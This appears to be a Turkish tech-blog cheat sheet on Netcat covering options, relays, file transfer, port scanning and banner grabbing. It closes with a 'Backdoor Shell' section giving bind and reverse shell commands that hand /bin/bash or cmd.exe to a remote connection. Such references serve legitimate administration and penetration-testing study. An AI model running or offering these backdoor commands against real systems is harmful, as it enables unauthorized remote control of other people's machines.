Netcat Kullanımı - Teknik BLOG.ORG

Netcat Kullanımı
Bu doküman, Netcat’in hem Linux hem de UNIX sistemlerdeki
çeşitli kullanım şekillerinden bahsetmektedir.
Temel Kullanım :
Basit Netcat Istemci
#nc [Hedef IP] [Port]
Vermiş olduğunuz hedef IP’nin yine vermiş olduğunuz porta
bağlantı kurar.
Basit Netcat Dinleyici
#nc –l –p [localport]
Yerelde verdiğiniz portta Netcat dinleyici kurar.
Netcat Komutları
#nc [options] [Hedef IP Adresi] [port/lar]
[Hedef IP Adresi] kısmı basit olarak karşı tarafın IP adresi
ya da domain adıdır.
-l
: Listen mod ( dinleme modu ) (varsayılan olarak
istemci moddadır)
-L
: Listen harder (yalnızca Netcat’in Windows
versiyonu için desteklidir. Bir istemci bağlantısı koptuktan
sonra tekrar dinlemeyi otomatik başlatmak amacıyla Netcat’e
kalıcı bağlantı sağlar.)
-u
-p
istemci
porttur.)
: UDP mod (varsayılan TCP)
: Yerel port (Dinleme modunda bu port dinlenir,
modda ise bütün paketlerin gönderildiği kaynak
-e
yarar.
: Kurulan bağlantıdan sonra program çalıştırmaya
–n
: DNS sorgusu yapmaması için kullanılır.
-z
: Zero I/O mod (Hiçbir very göndermez)
-wN
:Bağlantı timeout, STDIN kapandıktan sonra N saniye
bekler.Bir Netcat istemci veya dinleyici bu komut ile bağlantı
kurması için N sn bekler. Eğer bu süre zarfında bağlantı
gerçekleşmezse Netcat çalışmayı durdurur.
-v
:Ayrıntılı modu. Meydana gelen Standart Error
hatayı ekrana yazdırır.
-vv
:Daha Ayrıntılı modu. Standart Error hakkında daha
fazla ayrıntı yazdırır.
Netcat Windows Kullanımı :
İstemci’den Dinleyici’ye Aktarım
C: \> echo nc [Hedef IP] [Hedef Port] > deneme.bat
C: \> nc –l –p [YerelPort] –e deneme.bat
YerelPort’dan Hedef IP’nin Hedef Portuna kurulan bağlantı ile
paketler gönderilir.
Dinleyici-Dinleyici Aktarım
C: \> echo nc –l –p [YerelPort2] > deneme.bat
C: \> nc –l –p [YerelPort1] –e deneme.bat
YerelPort1’de kurulan bir bağlantı ile YerelPort2 ‘ye paket
gönderimi şeklinde bir aktarım oluşturulur.
İstemci-İstemci Aktarım
C: \> echo nc [Sonraki IP] [Port 2] > deneme.bat
C: \> nc [Önceki IP] [Port 1] -e deneme.bat
Önceki IP’nin Port 1 ‘inden Sonraki IP’nin Port 2’sine paket
gönderimi ile aktarım olur.
Dosya Transferi
İstemciden Dinleyiciye Dosya Gönderme
#nc –l –p [Yerel Port] > [giden dosya]
Yerel Port dinlenir ve “giden dosya” çıktısı yüklenir.
#nc –w3 [Hedef IP] [Hedef Port] < [gelen dosya]
“gelen dosya” Hedef IP’nin Hedep portuna push edilir.
Dinleyici’den İstemci’ye Dosya Çekmek
#nc –l –p [Yerel Port] < [gelen dosya]
Yerel Port dinlenir ve “gelen dosya” push etmeye hazırlanır.
#nc –w3 [Hedef IP] [Hedef Port] > [giden dosya]
Hedef IP’nin Hedef Portu ile bağlantı kurulur ve “giden dosya”
çekilir.
TCP Port Tarayıcı
IP Adresin Port Taraması
#nc –v –n –z –w1 [Hedef IP] [Başlangıç portu]-[Bitiş portu]
Belirtilen port aralığında hedef IP’ye –n (isimleri çözmeden)
–z (herhangi bir data göndermeden) –w1 Bağlantı kurmak için 1
sn ‘den daha fazla beklemeden port taraması gerçekleştirme
işlemine başlar.
TCP Banner Grabber
Linux IP adresine üzerinde çalışan TCP servislere Banner
Grabbing
#echo “ “ | nc –v –n –w1 [Hedef IP] [baş. port]- [bitiş Port]
Backdoor Shell
Linux’da backdoor shell dinleme
#nc –l -p [Yerel Port] –e /bin/bash
Windows’da backdoor shell dinleme
C: \> nc –l –p [Yerel Port] –e cmd.exe
Tersine backdoor shell dinleme (Linux)
# nc [Senin IP adresin] [port] –e /bin/bash
Tersine backdoor shell dinleme (Windows)
C: \> nc [Senin IP adresin] [port]–e cmd.exe